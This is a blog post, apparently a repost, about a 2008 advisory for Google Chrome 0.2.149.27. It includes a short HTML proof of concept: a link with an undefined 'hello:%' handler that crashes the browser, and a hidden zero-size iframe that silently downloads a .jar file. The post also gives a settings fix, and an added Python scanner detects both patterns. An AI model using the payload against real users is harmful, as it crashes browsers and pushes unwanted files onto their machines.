An undefined handler crashes Google Chrome, oops


"Whoa! Google Chrome has crashed. Restart now?"

Affected version:
Google Chrome Browser 0.2.149.27

Test environment:
Windows XP SP3
Windows 2003 SP1

Problem:

An issue exists in how Chrome behaves with undefined handlers in chrome.dll version 0.2.149.27. A crash can result without user interaction. When a user is made to visit a malicious link that has an undefined handler followed by a 'special' character, Chrome crashes with a Google Chrome message window "Whoa! Google Chrome has crashed. Restart now?". It crashes on "int 3" at 0x01002FF3 as an exception/trap, followed by a "POP EBP" instruction pointed to by the EIP register at 0x01002FF4.

Advisory URL: http://evilfingers.com/advisory/google_chrome_poc.php

Demo code:

<html>
<head></head>
<body>
demo <a href="hello:%">HERE</a>

<iframe src="Free Coupwns!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!.jar" frameborder=0 width=0 height=0></iframe>
</body>
</html>

The demo code above also covers the "Google Chrome vulnerable to carpet-bombing flaw" that Chrome inherits from its WebKit 525.13 (Safari 3.1) base (look at the iframe together with the link). With default settings Google Chrome downloads files automatically without any prompt; simply go to the "Minor Tweaks" tab (中级用户选项) and tick "Ask where to save each file before downloading" to avoid this flaw (PS: that way you get asked for a save location, so you know a file is about to be downloaded; otherwise Google Chrome quietly downloads it for you without your noticing).
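As an added example (not code from the original post or the advisory), here is a small scanner that flags the two constructs the demo page combines: an anchor whose scheme has no built-in handler followed by a malformed `%` escape, and a zero-size iframe that pulls in a file the browser would download silently. The known-scheme set, the extension list and the sample HTML are assumptions constructed for the example.

```python
import re
from html.parser import HTMLParser

# Schemes a browser has a built-in handler for (assumed, illustrative list).
KNOWN_SCHEMES = {"http", "https", "ftp", "file", "mailto", "javascript", "data", "about"}
# File types Chrome 0.2 fetched without prompting by default; .jar is the one from the PoC.
DOWNLOAD_EXTS = (".jar", ".exe", ".msi", ".scr", ".bat")
# A '%' not followed by two hex digits is a malformed escape (the advisory's "special character").
BAD_ESCAPE = re.compile(r"%(?![0-9A-Fa-f]{2})")
SCHEME = re.compile(r"^([A-Za-z][A-Za-z0-9+.\-]*):(.*)$", re.S)


class PocScanner(HTMLParser):
    """Collects (finding, value) pairs for the two patterns the demo page combines."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "a" and a.get("href"):
            m = SCHEME.match(a["href"].strip())
            # Undefined scheme plus malformed escape: the combination that trips the int 3 in chrome.dll
            if m and m.group(1).lower() not in KNOWN_SCHEMES and BAD_ESCAPE.search(m.group(2)):
                self.findings.append(("undefined-handler-bad-escape", a["href"]))
        elif tag == "iframe" and a.get("src"):
            src = a["src"].strip()
            hidden = a.get("width") == "0" or a.get("height") == "0"
            # Zero-size iframe pointing at a downloadable file: the carpet-bombing pattern
            if hidden and src.lower().endswith(DOWNLOAD_EXTS):
                self.findings.append(("hidden-iframe-download", src))


def scan_html(html):
    """Return the list of suspicious constructs found in an HTML document."""
    scanner = PocScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample: the post's PoC with two benign links added for contrast.
SAMPLE = """<html><body>
<a href="http://example.com/?q=100%25">benign, valid escape</a>
<a href="hello:ok">undefined handler but no special character</a>
demo <a href="hello:%">HERE</a>
<iframe src="Free Coupwns!!!!.jar" frameborder=0 width=0 height=0></iframe>
</body></html>"""
```

Running `scan_html(SAMPLE)` reports only the `hello:%` link and the hidden `.jar` iframe; the benign links produce no finding.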

More "Whoa! Google Chrome has crashed. Restart now?" prompts

When reposting this original article, please credit the source: [Lin's Space|Only]

Permalink: http://clin003.com/exploits/google-chrome-crashes-with-all-tabs-with-an-undefined-handler-followed-by-a-special-character-1464/
